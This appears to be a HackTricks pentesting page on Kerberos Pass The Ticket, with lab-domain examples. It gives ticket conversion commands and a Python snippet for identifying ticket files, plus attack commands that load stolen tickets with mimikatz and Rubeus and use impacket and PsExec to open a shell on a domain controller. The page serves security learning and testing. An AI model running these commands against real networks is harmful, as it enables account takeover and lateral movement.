HackTricks

Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
Read:

Swapping Linux and Windows tickets between platforms

The ticket_converter script: the only parameters it needs are the current ticket and the output file. It automatically detects the format of the input ticket file and converts it. For example:
[email protected]:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
[email protected]:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
Kekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.
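The two formats can be told apart from their first bytes, which is also useful when triaging a host for ticket files left on disk. The following is an added example, not code from ticket_converter or from the original page: it assumes the MIT ccache version prefix (0x0501 to 0x0504) and the KRB-CRED `[APPLICATION 22]` tag from RFC 4120, and `identify_ticket` and both sample byte strings are constructed for illustration.

```python
import struct

KRB_CRED_TAG = 0x76  # ASN.1 [APPLICATION 22]: outer tag of KRB-CRED (RFC 4120)

# Constructed samples, not real tickets: a v4 ccache header with one
# time-offset tag, and a KRB-CRED skeleton holding only pvno=5, msg-type=22.
SAMPLE_CCACHE = bytes.fromhex("0504000c00010008ffffffff00000000")
SAMPLE_KIRBI = bytes.fromhex("760c300aa003020105a103020116")


def _der_length(buf, pos):
    """Decode the DER length at buf[pos]; return (length, offset of value)."""
    first = buf[pos]
    if first < 0x80:                       # short form
        return first, pos + 1
    n = first & 0x7F                       # long form: n length bytes follow
    if n == 0 or n > 4 or pos + 1 + n > len(buf):
        raise ValueError("unsupported or truncated DER length")
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def identify_ticket(data):
    """Classify raw file bytes as 'ccache', 'kirbi' or 'unknown'."""
    if len(data) < 4:
        return "unknown"
    # MIT credential cache: 2-byte big-endian version, 0x0501 to 0x0504.
    (version,) = struct.unpack(">H", data[:2])
    if 0x0501 <= version <= 0x0504:
        return "ccache"
    # kirbi: APPLICATION 22 wrapping one SEQUENCE that spans the whole file.
    if data[0] == KRB_CRED_TAG:
        try:
            length, body = _der_length(data, 1)
        except ValueError:
            return "unknown"
        if body < len(data) and body + length == len(data) and data[body] == 0x30:
            return "kirbi"
    return "unknown"


if __name__ == "__main__":
    for name, blob in [("ccache sample", SAMPLE_CCACHE),
                       ("kirbi sample", SAMPLE_KIRBI),
                       ("truncated kirbi", SAMPLE_KIRBI[:-1]),
                       ("plain text", b"not a ticket")]:
        print(f"{name}: {identify_ticket(blob)}")
```

Checking that the DER length spans the whole file keeps ordinary text files that happen to start with the byte 0x76 (`v`) from being reported as kirbi.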

Pass The Ticket Attack

Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/[email protected] -k -no-pass
Windows
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe][email protected]"
.\Rubeus.exe ptt /ticket:[0;28419fe][email protected]
klist #List tickets in cache to check that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd